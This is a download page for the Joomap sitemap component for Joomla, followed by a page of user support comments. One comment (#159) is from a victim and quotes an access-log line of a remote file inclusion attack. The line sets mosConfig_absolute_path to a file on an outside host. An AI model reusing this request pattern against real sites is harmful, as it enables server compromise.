Joomap - A Sitemap Component for Joomla CMS

Joomap is a Sitemap component for Joomla CMS version 1.5.x. Joomap offers a wide range of configuration options and can also generate a Google Sitemaps listing of your website’s structure. Joomap also implements a very simple plugin-mechanism to import content from external components.


Download: Joomap 2.06 Beta 2c (for Joomla 1.5.x)

Download old version: Joomap 2.05 (for Joomla 1.0.x)

The latest development version is available as a subversion repository at Googlecode:
svn checkout http://joomap.googlecode.com/svn/trunk/ joomap


Please note: The new version 2.06 is still a beta version. If you find any issues with it, please post a comment at the bottom of this page to let me know. I will try my best to track down the problem as soon as possible. However, as I also have a private life and a job that keeps me busy, it might take a couple of days for me to release a fixed version. Thank you.


Screenshots of the Joomap Component Administration Panel:

Joomap Administration Screenshot #1

Joomap Administration Screenshot #1

Joomap Administration Screenshot #2

Joomap Administration Screenshot #2

Joomap Administration Screenshot #3

Joomap Administration Screenshot #3

Joomap in action on my local Testsite:

Joomap Frontend Screenshot

Joomap Frontend Screenshot

Stand: 19.08.2008, 22:02 Uhr

271 Kommentare

Seite 17 von 28 « Zurück1121314151617181920212228Weiter »Zeige alle

  1. Hi. I am having trouble with the article links generated by Joomap. For example, under my “Sold” menu, which is a blog listing by section, my article link for id #70 shows up as “http://arteuphoria.com/sold/70.html” which results in a 404 page. (Obviously I have SEF turned on and am using .htaccess.)

    My articles show up correctly when they are addressed as http://arteuphoria.com/component/content/article/70.html. Is there any way I can get Joomap to generate a link to my article that works?

    Thanks!
    Dave Herrington
    Belle Mead, New Jersey, USA

  2. No hablo ingles, lo he traducido con google.
    en mi sitio, tengo noticias con títulos muy largos. Como puedo hacer para que el css permita que se corten y sigan en la línea siguiente. Gracias

    I do not speak English, I translated with google.
    on my site, I have news with very long titles. How can I make the css let them cut out and continue on the next line. Thank you

  3. [...] Descargar Joomap, componente para generar Google Sitemaps para Joomla! [...]

  4. Hello everybody.

    I want to connect Joomap 2.06 with Phoca gallery 2.2.3. To do this I used Datso gallery plugin and modified it according to Phoca tables. But if there is only one menu item of Phoca gallery kind that’s OK. If there are 2 ore more menu items of Phoca - problems with displaying occure. There all categories and subcategories displayed in each menu item of map. Is here anyone who can modify this code (I’m not a programmer)?

    link, ‘option=com_phocagallery’) ) {
    return true;}
    return false;
    }

    function &getTree( &$joomap, &$parent ) {
    global $database;

    $list = array();

    $database->setQuery(”select id, title, parent_id from #__phocagallery_categories order by ordering”);
    $categories = $database->loadObjectList();

    foreach($categories as $category) {
    $node = new stdclass;
    $node->id = $parent_id->id;
    $node->name = $category->title;
    $node->link = $parent_id->link.’&Itemid=’.$parent_id->id.’&func=viewcategory&catid=’.$category->id;
    $node->tree = array();
    $node->pid = $category->parent_id;

    $list[$category->id] = $node;
    }

    foreach( $list as $id => $category ) { // move children into their parent nodes
    if( $category->pid > 0 && isset($list[$category->pid]) ) {
    $list[ $category->pid ]->tree[$id] = &$list[$id];
    }
    }

    foreach( $list as $id => $category ) { // remove children from top tree
    if( $category->pid > 0 ) {
    unset( $list[$id] );
    }
    }

    return $list;
    }
    }

    ?>

  5. Thanks for doing Joommap!

    The component works fine but i need to fix css style. with Internet Explorer 8 doesn’t look like with Firefox.

  6. i like the component, is there a virtuemart add-on?

  7. #159 Thib sagt:
    16.04.2009 07:32

    My website was hacked through this component by calling this url : xxx.xxx.xxx.xx http://www.xxxxxx.org - [27/Mar/2009:03:12:01 +0100] “POST /site/index.php/component/option,com_joomap/Itemid,33//index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://asu.pl/sebelah/66.png?

    I have this last version installed (2.05) on Joomla 1.15. Maybe there is a problem on the component ?

  8. #160 Tube2IC sagt:
    21.04.2009 02:54

    Adding a Sitemap to your Joomla 1.5 website.
    1. Download a version of Joomap that supports Joomla 1.5.
    2. Logon as Administrator on your Joomla website and use the Extensions menu Install/Uninstall function to install Joomap then select “Components” in the administration menu. Find Joomap in the dropdown and click on it.
    3. This brings you to the Joomap Configuration Window and the Menus tab is shown.
    4. Select the Menus that you want to appear on the Sitemap. Only show items that are Public and be sure to disable show for items that are restricted access in your site.
    5. You can use the arrows to move up or move down each menu and control where the contents of the menu will appear in the sitemap list. When you are done click on the Save Icon and also the Backup Settings Icon.
    6. Select one of your menu’s (usually the top menu) and add a new menu item called Site Map. Click on the Change Type Button in the Menu Item Type box.
    7. In the Select Menu Item Type tree, expand Internal Link by clicking on the arrow and find Joomap and click on it to select it. This will take you back to the previous screen and the Link will now be updated to show “index.php?option-com_joomap”. You can also link to the URL
    http://www.”yourwebsite.com”//index.php?option=com_joomap [Don’t forget to replace “yourwebsite.com” with the actual URL of your website.

    This is all you have to do if you simply want to display just a Sitemap on your site.

    The next post tells how to add Search Engine Optimization using Joomap

  9. #161 Tube2IC sagt:
    21.04.2009 02:56

    Adding Search Engine Optimization using Google to your Website.
    1. Open a new browser window and go to http://www.google.com/webmasters/tools/
    2. Logon using your google account. If you don’t have one, sign up for one.
    3. On the dashboard, use the form to submit the URL of your website and click the add site button. Do not close the window yet.
    4. Open a new browser window and go to http://extensions.joomla.org/extensions/site-management/site-map and search for and download the Google Sitemaps - Verification Key Plugin.
    5. Logon as Administrator on your Joomla website and use the Extensions menu Install/Uninstall function to install the plugin. Then click on the Plugin Manager function in the same Extensions menu.
    6. Locate the Plugin [It may be called System - GoogleSiteMap] Click on it to Edit the plugin parameters.
    7. Go back to the Browser window where the Google Dashboard is open. Click on “Verify your Site” and select “Add a Meta Tag” in the Choose Verification Method drop down list.
    8. Copy the Meta Tag into Notepad. Do not close the window just yet.
    9. From Notepad copy only the information contained between the ” ” in the content= field and paste this information into Parameters box in the open Plugin Manager in the form GoogleSiteMap Key and click on Save.
    10. Go back to the Google window and click on the Verify Button. It may take a few minutes. Once it is done, the google site should show an Overview window and a menu. Select Sitemap in the menu. Do not close the window yet.
    11. Go back to the Joomla Administrator window and open the Joomap configuration from the Components menu and this time click on dislay tab.
    12. Copy the URL shown next to Google Sitemap: in the Google Sitemap box and paste it into the submit sitemap form. Logout of all windows and you are done!

Seite 17 von 28 « Zurück1121314151617181920212228Weiter »Zeige alle


Kommentieren